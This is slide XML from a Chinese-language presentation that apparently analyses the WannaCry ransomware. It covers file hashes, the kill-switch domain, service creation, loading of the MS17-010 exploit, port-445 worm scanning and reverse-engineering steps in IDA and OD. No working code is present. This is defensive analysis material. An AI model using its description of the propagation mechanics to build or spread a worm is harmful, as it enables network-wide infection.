              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MD5: DB349B97C37D22F5EA1D1841E3C89EB4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SHA1: E889544AFF85FFAF8B0D0DA705105DEE7C97FE26</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CRC32: 9FBB1227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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113115014-632412971.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13428B09-B629-4767-AD36-798CE03FB7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77" y="3247074"/>
            <a:ext cx="9636246" cy="2829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82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WannaCry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1920364" y="1143656"/>
            <a:ext cx="10603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大量文件被加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后缀名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.WNCRY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935F7C-827A-441D-977B-7F020A0DC67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405115" y="329031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每隔一段时间弹出勒索窗口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113402712-137545507.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68620D1-BA26-433E-875B-60AAD9413C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16" y="449872"/>
            <a:ext cx="1593396" cy="14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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113416487-1656784003.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DA9E057-F8FD-46F8-A0CC-49D27DBFFC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3" y="1934613"/>
            <a:ext cx="6874984" cy="44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167785-A6F7-482F-9C7F-003C60824836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654178" y="32903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桌面背景被强制更换</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113431188-1180193392.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B61368-3E05-4647-A5F0-2E5BD63E6A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26" y="1937282"/>
            <a:ext cx="6127037" cy="4610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63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713024" y="1147607"/>
            <a:ext cx="10603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病毒执行后会尝试连接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113449344-1295301623.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{147C841C-BD94-4639-B671-D5B16D87DB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88" y="1889429"/>
            <a:ext cx="8165871" cy="3373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4BABA61-667A-44AE-817E-83225CD1A851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892627" y="5485141"/>
            <a:ext cx="9221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进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>fun_enterCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>之后通过判断参数的个数来执行相应的流程。当参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，进入服务流程 否则进入病毒主流程。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167912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837538" y="2230457"/>
            <a:ext cx="3627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创建服务启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>每次开机都会自启动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BABA61-667A-44AE-817E-83225CD1A851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8109625" y="4642472"/>
            <a:ext cx="2999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从内存中读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞利用代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>x64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>两个版本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服务流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113510244-213157656.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3156F173-1957-4D6D-AE8D-720502854D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07" y="1549054"/>
            <a:ext cx="7164719" cy="241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s://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113522289-504514757.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E780D61F-7A03-4E1B-ADB9-D9FBD6B3CA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5878"/>
            <a:ext cx="7543827" cy="2523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75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837538" y="2230457"/>
            <a:ext cx="3627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分别创建两个线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描内网和外网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行蠕虫传播感染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BABA61-667A-44AE-817E-83225CD1A851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8109625" y="4642472"/>
            <a:ext cx="299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对于内网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>则直接扫描当前计算机所在的网段进行感染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服务流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113532000-382348517.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47553624-83D4-4FAF-A836-4456E17866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27427"/>
            <a:ext cx="6978934" cy="364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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113542476-238932578.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A848D7DF-7584-4B22-876B-5FC62E63B8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798"/>
            <a:ext cx="7139810" cy="2757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545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837538" y="2230457"/>
            <a:ext cx="3627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对于外网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>随机生成公网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>尝试连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口 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BABA61-667A-44AE-817E-83225CD1A851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6304386" y="5072140"/>
            <a:ext cx="2999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连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口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服务流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113603923-1890733623.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38DE1554-3156-4F79-83E0-912E2598B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4165"/>
            <a:ext cx="5887616" cy="368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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113552168-1223233013.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC328C8-3D52-4A17-8F56-C0A6045066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93" y="0"/>
            <a:ext cx="6995980" cy="4198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729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837537" y="2230457"/>
            <a:ext cx="832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如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口连接成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>则对该地址进行漏洞攻击。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服务流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113614572-865145963.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D61D4AD-66BB-40DD-912E-8D529C08F8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841" y="2728742"/>
            <a:ext cx="9587916" cy="3322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25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837538" y="2230457"/>
            <a:ext cx="2708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加载资源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>并把资源写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>"C:\windows\tasksche.exe"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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113625017-1283779354.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF90BC6D-1A0A-43BD-88B9-7276918CAD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01" y="319066"/>
            <a:ext cx="8092453" cy="621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788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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113635441-491821600.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C585CF6-43A3-439E-9D16-E8C7175F1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0" y="1605671"/>
            <a:ext cx="9441867" cy="131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251520" y="2137098"/>
            <a:ext cx="40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接着执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>tasksche.exe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65C7B4-5371-468D-A6C4-B71A076AE4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7124556" y="5398383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依照目录找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>tasksche.exe </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113647441-1252954178.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{860BA383-E6BD-442C-AFA0-7453F16563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76" y="2237607"/>
            <a:ext cx="6229904" cy="19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s://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113658697-229448098.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18D54CA1-604A-43D7-B856-3ED3F5FC3A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987"/>
            <a:ext cx="6706559" cy="3152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649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251520" y="2137098"/>
            <a:ext cx="4016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把使用到的一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址赋值给全局变量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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113718896-1415273687.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6516ED5-9E44-4BE2-AAE2-0D04ED3CA1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32" y="16210"/>
            <a:ext cx="7834968" cy="378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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113723684-1354072952.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{821FD83A-44CD-49B7-BC7E-3A42E96B91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3036"/>
            <a:ext cx="7834968" cy="2968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7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三、事故环境取证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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Ghost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>制作系统镜像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D25484-9AEE-47BE-A0E6-C3C888AB6A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47" y="837829"/>
            <a:ext cx="6763709" cy="534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818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797153" y="672885"/>
            <a:ext cx="6727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加载 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>t.wncy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>并执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>t.wncy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>TaskStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113736395-2085405220.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA05B71-4CC0-4558-BB59-AF114C606B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69" y="1056523"/>
            <a:ext cx="8394566" cy="22184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CFC93A-FCDD-4BB6-BD20-681B4FA2BD9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376717" y="3981482"/>
            <a:ext cx="4596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此处我们无法继续使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IDA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>往下分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>t.wncy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的内容是动态申请出来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>我们使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>OD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>把这块内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>出来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>再使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IDA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>分析。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113747056-1515742477.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31218F7D-EB25-48EE-99F1-231B353706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52" y="2148620"/>
            <a:ext cx="7084748" cy="4704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33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03A34-F23F-487C-92A6-7E6E94149E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496681" y="1309572"/>
            <a:ext cx="6727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接下来继续使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IDA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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4B2C77-2125-41BD-AA64-80CF40A49294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798603" y="363926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创建互斥体</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113825890-968813908.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016785F7-27FD-4F75-9B39-A5260E90EC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953" y="2800215"/>
            <a:ext cx="7537317" cy="23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10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4B2C77-2125-41BD-AA64-80CF40A49294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733288" y="2696873"/>
            <a:ext cx="2691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初始化全局变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一些使用到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>API)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113842562-1728677214.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D9A6C1-C0AF-48EA-AC5F-757120D352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60" y="1057235"/>
            <a:ext cx="8172340" cy="258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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113851620-1149693431.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4221AB2-FD15-47EE-9FEA-46FFB62883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40" y="4045759"/>
            <a:ext cx="7389546" cy="2654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906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4B2C77-2125-41BD-AA64-80CF40A49294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733288" y="2696873"/>
            <a:ext cx="3260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检查互斥体是否存在</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113919282-694927637.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693413DC-CD23-4AB4-9177-AE138B0E35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70" y="449872"/>
            <a:ext cx="7000771" cy="37557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B1F3EC-0641-44CA-8358-4ADD8FBB5836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201647" y="4498030"/>
            <a:ext cx="11510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检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>00000000.dky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>00000000.pky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是否存在，是否是配对的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果是返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>否则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113931919-1395892062.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB1D1CB-BBEF-42F4-8CC5-472AA2ADE8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8" y="5037766"/>
            <a:ext cx="11314341" cy="137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507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4B2C77-2125-41BD-AA64-80CF40A49294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
